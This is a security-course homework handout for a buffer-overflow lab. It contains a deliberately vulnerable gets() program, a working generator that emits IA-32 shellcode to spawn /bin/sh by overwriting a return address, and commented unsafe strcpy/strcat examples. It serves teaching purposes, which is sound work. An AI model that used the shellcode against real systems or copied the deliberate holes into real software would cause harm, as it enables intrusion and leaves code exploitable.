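/*
 * boaddr: the deliberately vulnerable target program for the stack-smashing lab.
 *
 * Reads one line from stdin into a 256-byte stack buffer with gets(), which
 * takes no length bound, so a longer line keeps writing past `a` into
 * whatever lies above it on the stack (saved registers, frame pointer, return
 * address). It then echoes the buffer and prints the buffer's address; that
 * address is the value the exploit generator takes as its argument.
 *
 * SECURITY: gets() is the intended vulnerability and is kept on purpose
 * (it was removed from the language in C11). Never reuse this code outside
 * the lab; fgets(a, sizeof a, stdin) is the bounded replacement.
 * Requires <stdio.h> for gets/printf.
 */
int main(int argc, char *argv[])
{
    char a[256];

    gets(a);                       /* unbounded read: the lab's overflow point */
    printf("a=%s\n", a);

    /* A pointer must be printed with %p; %x expects an unsigned int, which is
       undefined behaviour and truncates the address on 64-bit builds. On
       glibc %p yields the same "0x..." form as the transcript below. */
    printf("&a=%p\n", (void *) a);
    return 0;
}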
[root@rh72 bufferOverflow]# ./boaddr
GETS
&a=0xbfffef50
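#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Payload generator for the boaddr lab.
 *
 * Writes to stdout a 288-byte string that, when fed to boaddr's gets(a)
 * (a is char[256]), overruns the buffer and overwrites the saved return
 * address with the value given in argv[1] in hex (the "&a=0x..." value
 * boaddr prints). The shellcode is placed at the front of the payload, i.e.
 * at the start of `a`, so returning to &a executes it.
 *
 * sc[] is Linux/IA-32 int 0x80 shellcode and decodes as:
 *   close(0); open("/dev/tty", ...); execve("/bin//sh", {"/bin//sh", 0}, 0);
 * Re-opening /dev/tty on fd 0 presumably gives the spawned shell a usable
 * stdin after gets() consumed the payload -- confirm against the lab notes.
 * The target reads with gets(), so no payload byte may be 0x0a (newline).
 */
char sc[] =
    "\x31\xc0\x31\xdb\xb0\x06\xcd\x80"
    "\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80"
    "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

enum {
    PAYLOAD_LEN = 288,              /* 256-byte buffer + 32 bytes of frame above it */
    ADDR_SIZE   = 4,                /* the target is 32-bit: one address = 4 bytes */
    ADDR_SLOTS  = PAYLOAD_LEN / ADDR_SIZE
};

int main(int argc, char **argv)
{
    /* The original filled the buffer through a long* (72 stores). That is
       only 288 bytes when long is 4 bytes; on an LP64 build host the same
       loop writes 576 bytes and overruns large_string itself. A fixed-width
       uint32_t keeps the payload correct regardless of host word size. */
    unsigned char large_string[PAYLOAD_LEN];
    uint32_t ret_addr;
    char *end;
    int i;

    if (argc < 2) {
        fprintf(stderr, "usage: %s <return address in hex, e.g. bfffef50>\n", argv[0]);
        return 1;
    }
    ret_addr = (uint32_t) strtoul(argv[1], &end, 16);
    if (end == argv[1] || *end != '\0') {
        fprintf(stderr, "bad address: %s\n", argv[1]);
        return 1;
    }

    /* Every 4-byte slot gets the return address (host byte order, as the
       original word stores did). Only the slot overlaying the saved EIP
       matters, but repeating it avoids having to know the exact offset. */
    for (i = 0; i < ADDR_SLOTS; i++)
        memcpy(large_string + i * ADDR_SIZE, &ret_addr, ADDR_SIZE);

    /* Shellcode at the front, where boaddr's `a` -- and thus ret_addr -- begins. */
    memcpy(large_string, sc, strlen(sc));

    /* The original printf("%s") relied on a NUL somewhere in the 288 bytes and
       otherwise read past the array; fwrite emits exactly PAYLOAD_LEN bytes. */
    if (fwrite(large_string, 1, PAYLOAD_LEN, stdout) != PAYLOAD_LEN)
        return 1;
    return 0;
}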
/* Original construction of "user:cpw" -- unbounded. strcpy and strcat take no
   length argument, so if record is a fixed-size array (its declaration is not
   visible here) and user or cpw is longer than what remains, the write runs
   past the end of record: the same class of bug as gets() in boaddr. */
strcpy(record, user);
strcat(record, “:”);
strcat(record, cpw);
/* The "fixed" version -- still overflows, for three separate reasons:
   1. strncpy does not NUL-terminate record when strlen(user) >= MAX_STRING_LEN-1,
      so the strcat below scans past the copied bytes looking for a terminator.
   2. strcat(record, ":") is still unbounded.
   3. strncat's third argument limits the characters *appended*, not the space
      left in record. With long user and cpw, record receives up to
      (MAX_STRING_LEN-1) + 1 + (MAX_STRING_LEN-1) + 1 = 2*MAX_STRING_LEN bytes --
      about twice what the bound suggests (record's size is not visible here;
      presumably MAX_STRING_LEN).
   A correct bounded form is snprintf(record, sizeof record, "%s:%s", user, cpw),
   checking the return value for truncation. */
strncpy(record, user, MAX_STRING_LEN-1);
strcat(record, “:”);
strncat(record, cpw, MAX_STRING_LEN-1);
Email me the above answers and the session data you capture as your homework deliverable. Alternatively, save the answers as a web page (hw2.html) or Word document (hw2.doc) in your cs591 directory on walrus.uccs.edu and email me just the URL.
Hint: Please read smashingHWHint.doc for detailed, step-by-step instructions on using gdb to work through the stack-smashing problems. http://cs.uccs.edu/~cs591/bufferOverflow/smashingHWHint.doc
Gnu Debugger (GDB) Quick Reference: http://cs.uccs.edu/~cs591/bufferOverflow/gdb.pdf
Note that internal rh72 and fc4 virtual machines were created for you on the EAS blade server running VMware ESX (vSphere). These images must stay exploitable for the lab, so keep them on the internal lab network and do not expose them elsewhere.